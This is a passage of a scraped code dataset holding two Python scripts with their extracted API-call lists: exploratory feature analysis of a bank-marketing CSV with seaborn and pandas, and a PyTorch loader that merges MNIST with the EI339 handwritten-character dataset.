random\n'), ((25807, 25886), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(ngf * mult)', '(ngf * mult * 2)'], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)'}), '(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1)\n', (25822, 25886), False, 'import torch\n'), ((27293, 27320), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(1)'], {}), '(1)\n', (27317, 27320), False, 'import torch\n'), ((27781, 27802), 'torch.nn.Dropout', 'torch.nn.Dropout', (['(0.5)'], {}), '(0.5)\n', (27797, 27802), False, 'import torch\n'), ((27884, 27911), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(1)'], {}), '(1)\n', (27908, 27911), False, 'import torch\n'), ((4945, 5019), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(0, 0, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1)\n', (4956, 5019), False, 'import cv2\n'), ((9103, 9128), 'numpy.asarray', 'np.asarray', (['[250, 0, 250]'], {}), '([250, 0, 250])\n', (9113, 9128), True, 'import numpy as np\n'), ((9158, 9183), 'numpy.asarray', 'np.asarray', (['[255, 0, 255]'], {}), '([255, 0, 255])\n', (9168, 9183), True, 'import numpy as np\n'), ((9205, 9231), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (9216, 9231), False, 'import cv2\n'), ((15727, 15752), 'random.uniform', 'random.uniform', (['(0.03)', '(0.1)'], {}), '(0.03, 0.1)\n', (15741, 15752), False, 'import random\n'), ((16144, 16169), 'random.uniform', 'random.uniform', (['(0.03)', '(0.1)'], {}), '(0.03, 0.1)\n', (16158, 16169), False, 'import random\n'), ((18751, 18777), 'random.uniform', 'random.uniform', (['(0.03)', '(0.09)'], {}), '(0.03, 0.09)\n', (18765, 18777), False, 'import random\n'), ((27391, 27419), 'torch.nn.ReplicationPad2d', 'torch.nn.ReplicationPad2d', (['(1)'], {}), '(1)\n', (27416, 27419), False, 'import torch\n'), ((27982, 28010), 'torch.nn.ReplicationPad2d', 'torch.nn.ReplicationPad2d', (['(1)'], {}), '(1)\n', (28007, 28010), False, 'import torch\n'), ((29682, 29718), 'numpy.transpose', 'np.transpose', (['image_numpy', '(1, 2, 0)'], {}), '(image_numpy, (1, 2, 0))\n', (29694, 29718), True, 'import numpy as np\n'), ((33750, 33785), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33762, 33785), False, 'import cv2\n'), ((5079, 5157), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 255, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1)\n', (5090, 5157), False, 'import cv2\n'), ((33871, 33906), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33883, 33906), False, 'import cv2\n'), ((5221, 5297), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 0, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1)\n', (5232, 5297), False, 'import cv2\n'), ((33986, 34021), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33998, 34021), False, 'import cv2\n'), ((5360, 5434), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 0, 0)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1)\n', (5371, 5434), False, 'import cv2\n'), ((5664, 5735), 'cv2.rectangle', 'cv2.rectangle', (['details', '(xmin, ymin)', '(xmax, ymax)', '(100, 100, 100)', '(-1)'], {}), '(details, (xmin, 
ymin), (xmax, ymax), (100, 100, 100), -1)\n', (5677, 5735), False, 'import cv2\n')]
|
'''
Created on 10-Jul-2018
@author: <NAME>
'''
# We will use seaborn to create plots
import seaborn as sns
# Matplotlib will help us to draw the plots
import matplotlib.pyplot as plt
sns.set(color_codes=True)
# Import pandas to manage data set
import pandas as pd
# Import NumPy for all mathematics operations on numerical data
import numpy as np
# Let's load the pre-processed version of data set
file_name = 'bank_data_test.csv'
# Load into a variable using pandas read_csv
data = pd.read_csv(file_name, delimiter=',')
# Let's verify the size of data set
print('Number of Instances: %d\nNumber of attributes: %d'%(data.shape[0],data.shape[1]))
'''
Number of Instances: 41188
Number of attributes: 21
'''
# Let's see a brief summary of some variables
print(data.describe()[['age','duration','campaign','pdays']])
'''
age duration campaign pdays
count 41188.00000 41188.000000 41188.000000 41188.000000
mean 40.02406 258.285010 2.567593 962.475454
std 10.42125 259.279249 2.770014 186.910907
min 17.00000 0.000000 1.000000 0.000000
25% 32.00000 102.000000 1.000000 999.000000
50% 38.00000 180.000000 2.000000 999.000000
75% 47.00000 319.000000 3.000000 999.000000
max 98.00000 4918.000000 56.000000 999.000000
'''
# Let's extract the output variable using its column name
y = data.y
# We will shuffle the data set before visualization
data = data.reindex(np.random.permutation(data.index))
# Here we will plot it, and count instances for different class
ax = sns.countplot(y,label="Count")
No, Yes = y.value_counts()
print('Number of subscribers: ', Yes)
print('Number of non-subscribers: ', No)
'''
Number of subscribers:  4640
Number of non-subscribers:  36548
'''
# Here show the created plots
plt.show()
# We will create 4 distribution plots
f, axes = plt.subplots(nrows=2,ncols=2, figsize=(15, 6))
# Monthly marketing activity
sns.distplot(data['month_integer'], kde=False, color="#ff3300", ax=axes[0][0]).set_title('Months of Marketing Activity Distribution')
axes[0][0].set_ylabel('Potential Clients Count')
axes[0][0].set_xlabel('Months')
# Potential subscriber on Age basis
sns.distplot(data['age'], kde=False, color="#3366ff", ax=axes[0][1]).set_title('Age of Potential Clients Distribution')
axes[0][1].set_ylabel('Potential Clients Count')
axes[0][1].set_xlabel('Age')
# Calls received during the marketing campaign
sns.distplot(data['campaign'], kde=False, color="#546E7A", ax=axes[1][0]).set_title('Calls Received in the Marketing Campaign')
axes[1][0].set_ylabel('Potential Clients Count')
axes[1][0].set_xlabel('Campaign')
# Jobs
sns.distplot(data['job'], kde=False, color="#33ff66", ax=axes[1][1]).set_title('Potential clients on Job basis')
axes[1][1].set_ylabel('Potential Clients Count')
axes[1][1].set_xlabel('Job Type')
#Show all created plots
plt.show()
# Use the full data set (the output variable y is kept and will appear in the correlation plot)
x = data
# Store output variable
y = data.y
# Now let's plot correlation between all the features
# Define figure size
f,ax = plt.subplots(figsize=(15, 15))
# Create correlation plot using seaborn
sns.heatmap(x.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax)
corr = x.corr()
# plot the correlations
plt.show()
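# (Illustrative sketch, not part of the original analysis.) One way to surface
# candidates for the manual drop_list below: list the feature pairs whose
# absolute correlation exceeds a threshold; the 0.7 cutoff here is an assumption.
upper = corr.where(np.triu(np.ones(corr.shape, dtype=bool), k=1))
high_corr_pairs = upper.stack().loc[lambda s: s.abs() > 0.7]
print(high_corr_pairs.sort_values(ascending=False))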
# We will drop highly correlated features
drop_list = ['emp.var.rate','nr.employed','cons.price.idx','euribor3m','previous']
#Let's remove the redundant features
data = x.drop(drop_list,axis = 1)
print(data.columns)
'''
Index(['age', 'duration', 'campaign', 'pdays', 'cons.conf.idx', 'job',
'marital', 'education', 'default', 'housing', 'loan', 'contact',
'day_of_week', 'poutcome', 'y', 'month_integer'],
dtype='object')
'''
data.to_csv('bank_data_feat_select_test.csv')
|
[
"matplotlib.pyplot.show",
"pandas.read_csv",
"matplotlib.pyplot.subplots",
"seaborn.countplot",
"seaborn.distplot",
"numpy.random.permutation",
"seaborn.set"
] |
[((187, 212), 'seaborn.set', 'sns.set', ([], {'color_codes': '(True)'}), '(color_codes=True)\n', (194, 212), True, 'import seaborn as sns\n'), ((493, 530), 'pandas.read_csv', 'pd.read_csv', (['file_name'], {'delimiter': '""","""'}), "(file_name, delimiter=',')\n", (504, 530), True, 'import pandas as pd\n'), ((1634, 1665), 'seaborn.countplot', 'sns.countplot', (['y'], {'label': '"""Count"""'}), "(y, label='Count')\n", (1647, 1665), True, 'import seaborn as sns\n'), ((1901, 1911), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1909, 1911), True, 'import matplotlib.pyplot as plt\n'), ((1961, 2008), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'ncols': '(2)', 'figsize': '(15, 6)'}), '(nrows=2, ncols=2, figsize=(15, 6))\n', (1973, 2008), True, 'import matplotlib.pyplot as plt\n'), ((2966, 2976), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2974, 2976), True, 'import matplotlib.pyplot as plt\n'), ((3156, 3186), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 15)'}), '(figsize=(15, 15))\n', (3168, 3186), True, 'import matplotlib.pyplot as plt\n'), ((3336, 3346), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3344, 3346), True, 'import matplotlib.pyplot as plt\n'), ((1529, 1562), 'numpy.random.permutation', 'np.random.permutation', (['data.index'], {}), '(data.index)\n', (1550, 1562), True, 'import numpy as np\n'), ((2038, 2116), 'seaborn.distplot', 'sns.distplot', (["data['month_integer']"], {'kde': '(False)', 'color': '"""#ff3300"""', 'ax': 'axes[0][0]'}), "(data['month_integer'], kde=False, color='#ff3300', ax=axes[0][0])\n", (2050, 2116), True, 'import seaborn as sns\n'), ((2290, 2358), 'seaborn.distplot', 'sns.distplot', (["data['age']"], {'kde': '(False)', 'color': '"""#3366ff"""', 'ax': 'axes[0][1]'}), "(data['age'], kde=False, color='#3366ff', ax=axes[0][1])\n", (2302, 2358), True, 'import seaborn as sns\n'), ((2526, 2599), 'seaborn.distplot', 'sns.distplot', (["data['campaign']"], {'kde': '(False)', 'color': '"""#546E7A"""', 'ax': 'axes[1][0]'}), "(data['campaign'], kde=False, color='#546E7A', ax=axes[1][0])\n", (2538, 2599), True, 'import seaborn as sns\n'), ((2745, 2813), 'seaborn.distplot', 'sns.distplot', (["data['job']"], {'kde': '(False)', 'color': '"""#33ff66"""', 'ax': 'axes[1][1]'}), "(data['job'], kde=False, color='#33ff66', ax=axes[1][1])\n", (2757, 2813), True, 'import seaborn as sns\n')]
|
import os
import inspect
from tqdm import tqdm
import numpy as np
import typing
import cv2
import torchvision
import torch
from PIL import Image
from torch.utils.data import Dataset, DataLoader
# absolute directory of this file (correct even if the module is imported or called from elsewhere)
CRT_ABS_PATH = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# keys of dataset
KEYS = ["MNIST", "EI339", "combined"]
# relative to root/
PATH_TO_DATASET = {"MNIST": "MNIST/",
"EI339": "EI339-CN dataset sjtu/",
"MNIST+EI339": "MNIST+EI339/", }
# relative to root/PATH_TO_DATASET
DATASET_MAPPING_FN = {"MNIST": None,
"combined": None,
"EI339": {"train": {"data": "mapping/train_data.npy",
"label": "mapping/train_label.npy"},
"test": {"data": "mapping/test_data.npy",
"label": "mapping/test_label.npy"}, }, }
# relative to root/PATH_TO_DATASET
DATASET_SPLITS = {"MNIST": {"raw": "raw/",
"train": "processed/training.pt",
"test": "processed/test.pt"},
"EI339": {"raw": "",
"train": "processed/training.pt",
"test": "processed/test.pt"},
"MNIST+EI339": {"raw": None,
"train": "training.pt",
"test": "test.pt"}, }
"""
~ root (CRT_ABS_PATH)
+ --- PATH_TO_DATASET
+ --- DATASET_MAPPING_FN
+ --- DATASET_SPLITS
"""
def __ei339_generate_raw_mappings__() -> \
typing.Tuple[typing.Tuple[np.ndarray, np.ndarray],
typing.Tuple[np.ndarray, np.ndarray]]:
abs_train_data_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["train"]["data"])
abs_train_label_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["train"]["label"])
abs_test_data_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["test"]["data"])
abs_test_label_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["test"]["label"])
if os.path.exists(path=abs_train_data_fn) and os.path.exists(path=abs_train_label_fn) \
and os.path.exists(path=abs_test_data_fn) and os.path.exists(path=abs_test_label_fn):
# print("Mappings Loaded from File")
return (np.load(abs_train_data_fn), np.load(abs_train_label_fn)), \
(np.load(abs_test_data_fn), np.load(abs_test_label_fn))
__ensure_path_validation__(abs_train_data_fn)
__ensure_path_validation__(abs_train_label_fn)
__ensure_path_validation__(abs_test_data_fn)
__ensure_path_validation__(abs_test_label_fn)
train_data_map, train_label_map = [], []
test_data_map, test_label_map = [], []
for label_num in tqdm(range(1, 10 + 1)):
# print("Mapping Images of Label %d" % label_num)
abs_path_to_file_folder = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"],
DATASET_SPLITS["EI339"]["raw"], str(label_num))
abs_path_to_tr_files = os.path.join(abs_path_to_file_folder, "training/")
path_to_test_files = os.path.join(abs_path_to_file_folder, "testing/")
        # map folder "10" to label 10 and folders "1"-"9" to labels 11-19, i.e.
        # offset the EI339 classes by +10 so they never collide with MNIST's 0-9
        save_label_num = 0 if 10 == label_num else label_num
        save_label_num += 10
# Training Data
for file in os.listdir(abs_path_to_tr_files):
abs_path_to_tr_file = os.path.join(abs_path_to_tr_files, file)
train_data_map.append(abs_path_to_tr_file)
train_label_map.append(save_label_num)
# Test Data
for file in os.listdir(path_to_test_files):
abs_path_to_test_file = os.path.join(path_to_test_files, file)
test_data_map.append(abs_path_to_test_file)
test_label_map.append(save_label_num)
train_data_map = np.array(train_data_map) # (cnt,) <str> as <U129>
train_label_map = np.array(train_label_map) # (cnt,) <np.int32>
train_idx = np.arange(train_label_map.size)
np.random.shuffle(train_idx)
train_data_map = train_data_map[train_idx]
train_label_map = train_label_map[train_idx]
print("EI339: Train Data Mapping Shuffled")
test_data_map = np.array(test_data_map) # (cnt,) <str> as <U129>
test_label_map = np.array(test_label_map) # (cnt,) <int>
test_idx = np.arange(test_label_map.size)
np.random.shuffle(test_idx)
test_data_map = test_data_map[test_idx]
test_label_map = test_label_map[test_idx]
print("EI339: Test Data Mapping Shuffled")
np.save(arr=train_data_map, file=abs_train_data_fn)
np.save(arr=train_label_map, file=abs_train_label_fn)
np.save(arr=test_data_map, file=abs_test_data_fn)
np.save(arr=test_label_map, file=abs_test_label_fn)
return (train_data_map, train_label_map), (test_data_map, test_label_map)
def __ei339_load_raw_image__(path: str) -> np.ndarray:
img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, dsize=(28, 28))
# _, img = cv2.threshold(img, thresh=128, maxval=255, type=cv2.THRESH_BINARY)
img = 255 - img
return img
def __ensure_path_validation__(filename_with_path: str) -> None:
path = os.path.split(filename_with_path)[0]
if not os.path.exists(path):
os.mkdir(path)
assert os.path.exists(path), "[Error] Access to Directory \"%s\" is Denied" % path
def __ei339_process_raw_data__() -> None:
abs_train_dataset_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["train"])
abs_test_dataset_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["test"])
if os.path.exists(abs_train_dataset_path) and os.path.exists(abs_test_dataset_path):
return
__ensure_path_validation__(abs_train_dataset_path)
__ensure_path_validation__(abs_test_dataset_path)
(train_data_fn, train_label), (test_data_fn, test_label) = \
__ei339_generate_raw_mappings__()
# train data
train_data = []
for file in tqdm(train_data_fn):
train_data.append(__ei339_load_raw_image__(path=file))
train_data = np.array(train_data)
train_data = torch.from_numpy(train_data) # torch.Size([7385, 28, 28])
train_label = torch.from_numpy(train_label).long() # torch.Size([7385])
# print(train_data.shape, train_label.shape)
# test data
test_data = []
for file in tqdm(test_data_fn):
test_data.append(__ei339_load_raw_image__(path=file))
test_data = np.array(test_data)
test_data = torch.from_numpy(test_data) # torch.Size([2034, 28, 28])
test_label = torch.from_numpy(test_label).long() # torch.Size([2034])
# print(test_data.shape, test_label.shape)
torch.save((train_data, train_label), f=abs_train_dataset_path)
torch.save((test_data, test_label), f=abs_test_dataset_path)
print("EI339: Train & Test Data Saved")
def __combine_dataset__(data_fn_list: list, output_filename: str) -> None:
    assert len(data_fn_list) > 1, "[Error] Given to-Combine List Must Contain at Least Two Files"
if os.path.exists(output_filename):
return
__ensure_path_validation__(output_filename)
for file in data_fn_list:
if not os.path.exists(file):
raise RuntimeError("[Error] File \"%s\" NOT Exist" % file)
data_list, targets_list = [], []
for file in data_fn_list:
_data, _target = torch.load(file)
data_list.append(_data)
targets_list.append(_target)
data = torch.cat(data_list, dim=0)
targets = torch.cat(targets_list, dim=0)
torch.save((data, targets), f=output_filename)
print("Dataset Combined")
for file in data_fn_list:
print("\tFrom \"%s\"" % file)
print("\tTo \"%s\"" % output_filename)
class TorchLocalDataLoader(Dataset):
def __init__(self, train: bool = True,
transform: torchvision.transforms.transforms.Compose = None,
mnist: bool = False, ei339: bool = False):
        assert mnist or ei339, "[Error] No Dataset is Selected"
self.transform = transform
self.mnist_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["train"])
self.mnist_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["test"])
self.ei339_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["train"])
self.ei339_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["test"])
self.combined_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST+EI339"], DATASET_SPLITS["MNIST+EI339"]["train"])
self.combined_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST+EI339"], DATASET_SPLITS["MNIST+EI339"]["test"])
# initialize dataset: MNIST, EI339, combined
torchvision.datasets.MNIST(CRT_ABS_PATH, train=True, download=True)
torchvision.datasets.MNIST(CRT_ABS_PATH, train=False, download=True)
__ei339_process_raw_data__()
__combine_dataset__([self.mnist_train_path, self.ei339_train_path],
self.combined_train_path)
__combine_dataset__([self.mnist_test_path, self.ei339_test_path],
self.combined_test_path)
# get data from file, save to self.data, self.targets (type Tensor)
if mnist is True and ei339 is True:
data_file = self.combined_train_path if train else self.combined_test_path
self.data, self.targets = torch.load(data_file)
elif mnist is True:
data_file = self.mnist_train_path if train else self.mnist_test_path
self.data, self.targets = torch.load(data_file)
else: # ei339 is True
data_file = self.ei339_train_path if train else self.ei339_test_path
self.data, self.targets = torch.load(data_file)
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
img, target = self.data[idx], int(self.targets[idx])
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
return img, target
if "__main__" == __name__:
# # see MNIST processed file data structure
# # Tuple[Tensor(Size([60000, 28, 28])), Tensor(Size([60000]))]
# a = torch.load(os.path.join(PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["train"]))
# print(type(a))
# print(a[0].shape)
# print(type(a[0][0]))
# print(a[1].shape)
# print(type(a[1][0]))
# __ei339_process_raw_data__()
loader = TorchLocalDataLoader(
train=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize((0.1307,), (0.3081,)), ]),
mnist=True,
ei339=True
)
train_loader = DataLoader(dataset=loader, batch_size=30, shuffle=True)
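    # Illustrative sanity check (not part of the original script): fetch one batch
    # and confirm shapes and the label range. With batch_size=30 the images come
    # out as [30, 1, 28, 28]; MNIST contributes labels 0-9 and EI339 labels 10-19.
    images, targets = next(iter(train_loader))
    print(images.shape, targets.shape)
    print("labels in batch:", targets.min().item(), "to", targets.max().item())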
|
[
"os.mkdir",
"numpy.load",
"torch.cat",
"numpy.arange",
"torchvision.transforms.Normalize",
"os.path.join",
"torch.utils.data.DataLoader",
"torch.load",
"os.path.exists",
"torch.is_tensor",
"cv2.resize",
"numpy.random.shuffle",
"tqdm.tqdm",
"numpy.save",
"inspect.currentframe",
"torchvision.datasets.MNIST",
"os.listdir",
"torch.from_numpy",
"torch.save",
"cv2.imread",
"numpy.array",
"os.path.split",
"torchvision.transforms.ToTensor"
] |
[((1773, 1876), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['train']['data']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['train']['data'])\n", (1785, 1876), False, 'import os\n'), ((1906, 2010), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['train']['label']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['train']['label'])\n", (1918, 2010), False, 'import os\n'), ((2038, 2140), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['test']['data']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['test']['data'])\n", (2050, 2140), False, 'import os\n'), ((2169, 2272), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['test']['label']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['test']['label'])\n", (2181, 2272), False, 'import os\n'), ((3997, 4021), 'numpy.array', 'np.array', (['train_data_map'], {}), '(train_data_map)\n', (4005, 4021), True, 'import numpy as np\n'), ((4070, 4095), 'numpy.array', 'np.array', (['train_label_map'], {}), '(train_label_map)\n', (4078, 4095), True, 'import numpy as np\n'), ((4133, 4164), 'numpy.arange', 'np.arange', (['train_label_map.size'], {}), '(train_label_map.size)\n', (4142, 4164), True, 'import numpy as np\n'), ((4169, 4197), 'numpy.random.shuffle', 'np.random.shuffle', (['train_idx'], {}), '(train_idx)\n', (4186, 4197), True, 'import numpy as np\n'), ((4362, 4385), 'numpy.array', 'np.array', (['test_data_map'], {}), '(test_data_map)\n', (4370, 4385), True, 'import numpy as np\n'), ((4433, 4457), 'numpy.array', 'np.array', (['test_label_map'], {}), '(test_label_map)\n', (4441, 4457), True, 'import numpy as np\n'), ((4489, 4519), 'numpy.arange', 'np.arange', (['test_label_map.size'], {}), '(test_label_map.size)\n', (4498, 4519), True, 'import numpy as np\n'), ((4524, 4551), 'numpy.random.shuffle', 'np.random.shuffle', (['test_idx'], {}), '(test_idx)\n', (4541, 4551), True, 'import numpy as np\n'), ((4693, 4744), 'numpy.save', 'np.save', ([], {'arr': 'train_data_map', 'file': 'abs_train_data_fn'}), '(arr=train_data_map, file=abs_train_data_fn)\n', (4700, 4744), True, 'import numpy as np\n'), ((4749, 4802), 'numpy.save', 'np.save', ([], {'arr': 'train_label_map', 'file': 'abs_train_label_fn'}), '(arr=train_label_map, file=abs_train_label_fn)\n', (4756, 4802), True, 'import numpy as np\n'), ((4807, 4856), 'numpy.save', 'np.save', ([], {'arr': 'test_data_map', 'file': 'abs_test_data_fn'}), '(arr=test_data_map, file=abs_test_data_fn)\n', (4814, 4856), True, 'import numpy as np\n'), ((4861, 4912), 'numpy.save', 'np.save', ([], {'arr': 'test_label_map', 'file': 'abs_test_label_fn'}), '(arr=test_label_map, file=abs_test_label_fn)\n', (4868, 4912), True, 'import numpy as np\n'), ((5059, 5097), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_GRAYSCALE'], {}), '(path, cv2.IMREAD_GRAYSCALE)\n', (5069, 5097), False, 'import cv2\n'), ((5108, 5139), 'cv2.resize', 'cv2.resize', (['img'], {'dsize': '(28, 28)'}), '(img, dsize=(28, 28))\n', (5118, 5139), False, 'import cv2\n'), ((5439, 5459), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5453, 5459), False, 'import os\n'), ((5588, 5679), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", 
"DATASET_SPLITS['EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['train'])\n", (5600, 5679), False, 'import os\n'), ((5712, 5802), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['test'])\n", (5724, 5802), False, 'import os\n'), ((6182, 6201), 'tqdm.tqdm', 'tqdm', (['train_data_fn'], {}), '(train_data_fn)\n', (6186, 6201), False, 'from tqdm import tqdm\n'), ((6283, 6303), 'numpy.array', 'np.array', (['train_data'], {}), '(train_data)\n', (6291, 6303), True, 'import numpy as np\n'), ((6321, 6349), 'torch.from_numpy', 'torch.from_numpy', (['train_data'], {}), '(train_data)\n', (6337, 6349), False, 'import torch\n'), ((6558, 6576), 'tqdm.tqdm', 'tqdm', (['test_data_fn'], {}), '(test_data_fn)\n', (6562, 6576), False, 'from tqdm import tqdm\n'), ((6656, 6675), 'numpy.array', 'np.array', (['test_data'], {}), '(test_data)\n', (6664, 6675), True, 'import numpy as np\n'), ((6692, 6719), 'torch.from_numpy', 'torch.from_numpy', (['test_data'], {}), '(test_data)\n', (6708, 6719), False, 'import torch\n'), ((6877, 6940), 'torch.save', 'torch.save', (['(train_data, train_label)'], {'f': 'abs_train_dataset_path'}), '((train_data, train_label), f=abs_train_dataset_path)\n', (6887, 6940), False, 'import torch\n'), ((6945, 7005), 'torch.save', 'torch.save', (['(test_data, test_label)'], {'f': 'abs_test_dataset_path'}), '((test_data, test_label), f=abs_test_dataset_path)\n', (6955, 7005), False, 'import torch\n'), ((7215, 7246), 'os.path.exists', 'os.path.exists', (['output_filename'], {}), '(output_filename)\n', (7229, 7246), False, 'import os\n'), ((7639, 7666), 'torch.cat', 'torch.cat', (['data_list'], {'dim': '(0)'}), '(data_list, dim=0)\n', (7648, 7666), False, 'import torch\n'), ((7681, 7711), 'torch.cat', 'torch.cat', (['targets_list'], {'dim': '(0)'}), '(targets_list, dim=0)\n', (7690, 7711), False, 'import torch\n'), ((7717, 7763), 'torch.save', 'torch.save', (['(data, targets)'], {'f': 'output_filename'}), '((data, targets), f=output_filename)\n', (7727, 7763), False, 'import torch\n'), ((11328, 11383), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'loader', 'batch_size': '(30)', 'shuffle': '(True)'}), '(dataset=loader, batch_size=30, shuffle=True)\n', (11338, 11383), False, 'from torch.utils.data import Dataset, DataLoader\n'), ((2284, 2322), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_train_data_fn'}), '(path=abs_train_data_fn)\n', (2298, 2322), False, 'import os\n'), ((2327, 2366), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_train_label_fn'}), '(path=abs_train_label_fn)\n', (2341, 2366), False, 'import os\n'), ((2385, 2422), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_test_data_fn'}), '(path=abs_test_data_fn)\n', (2399, 2422), False, 'import os\n'), ((2427, 2465), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_test_label_fn'}), '(path=abs_test_label_fn)\n', (2441, 2465), False, 'import os\n'), ((3242, 3292), 'os.path.join', 'os.path.join', (['abs_path_to_file_folder', '"""training/"""'], {}), "(abs_path_to_file_folder, 'training/')\n", (3254, 3292), False, 'import os\n'), ((3322, 3371), 'os.path.join', 'os.path.join', (['abs_path_to_file_folder', '"""testing/"""'], {}), "(abs_path_to_file_folder, 'testing/')\n", (3334, 3371), False, 'import os\n'), ((3507, 3539), 'os.listdir', 'os.listdir', (['abs_path_to_tr_files'], {}), '(abs_path_to_tr_files)\n', (3517, 
3539), False, 'import os\n'), ((3762, 3792), 'os.listdir', 'os.listdir', (['path_to_test_files'], {}), '(path_to_test_files)\n', (3772, 3792), False, 'import os\n'), ((5335, 5368), 'os.path.split', 'os.path.split', (['filename_with_path'], {}), '(filename_with_path)\n', (5348, 5368), False, 'import os\n'), ((5383, 5403), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5397, 5403), False, 'import os\n'), ((5413, 5427), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (5421, 5427), False, 'import os\n'), ((5814, 5852), 'os.path.exists', 'os.path.exists', (['abs_train_dataset_path'], {}), '(abs_train_dataset_path)\n', (5828, 5852), False, 'import os\n'), ((5857, 5894), 'os.path.exists', 'os.path.exists', (['abs_test_dataset_path'], {}), '(abs_test_dataset_path)\n', (5871, 5894), False, 'import os\n'), ((7542, 7558), 'torch.load', 'torch.load', (['file'], {}), '(file)\n', (7552, 7558), False, 'import torch\n'), ((8267, 8358), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST']", 